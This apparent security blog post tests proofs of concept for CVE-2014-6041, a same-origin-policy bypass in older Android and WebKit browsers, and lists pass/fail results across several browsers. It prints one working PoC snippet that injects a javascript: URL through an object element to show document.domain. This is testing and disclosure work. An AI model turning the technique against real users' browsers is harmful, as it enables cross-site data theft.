CVE-2014-6041, Object Assignment, Same Origin Policy, User Agent, Results, file:/// Protocol, SOP, PoC's

TL;DR CVE-2014-6041 PoC's; Results for Multiple User Agents using the file:/// protocol.

CVE-2014-6041 References

The PoC's published by Rafay Baloc are available here and here.

Test Case #1 - Open in Android under 4.4 and/or Fuzz with User Agent of Phone, Tablet, GameConsole, Smart TV

PoC Generates multiple Alerts() from Bing using Android

Executed: function oops () { object = document.createElement("object"); object.setAttribute("data", ""); document.body.appendChild(object); object.onload = function() { object.setAttribute("data", "javascript:alert(document.domain)"); object.innerHTML = "foobar"; } } document.getElementById("foobar").innerHTML = oops();

Test Case #2

SAVE the HTML Source File to your Local Hard Drive and OPEN in Safari 7 or WebKit Nightly using file:///

file:///, CVE-2014-6041, Same Origin Policy, SOP, WebKit, Safari, SOP, innerHTML Read Test

Click "SOP Test" to Confirm the document.body.innerHTML property on

CVE-2014-6041 Results in Safari 7 file:/// Handler SOP Won't Fix (FAIL)
CVE-2014-6041, Same Origin Policy, SOP, WebKit, Safari 7, SOP, innerHTML Read Test,
CVE-2014-6041 Results in Chrome 37 file:/// Handler (PASS)
CVE-2014-6041, Same Origin Policy, SOP, Chrome 37, SOP, innerHTML Read Test,
CVE-2014-6041 Results in IE11 file:/// Handler (PASS)
CVE-2014-6041, Same Origin Policy, SOP, IE11, SOP, innerHTML Read Test,
CVE-2014-6041 Results in Opera file:/// Handler (PASS)
CVE-2014-6041, Same Origin Policy, SOP, Opera, SOP, innerHTML Read Test,
CVE-2014-6041 Results in Windows Mobile 7 http:// Handler (PASS)
Note - Didn't Load the HTML iFrame
CVE-2014-6041, Same Origin Policy, SOP, Opera, SOP, innerHTML Read Test,
CVE-2014-6041 Results in iPad2 http:// Handler (PASS)
CVE-2014-6041, Same Origin Policy, SOP, Opera, SOP, innerHTML Read Test,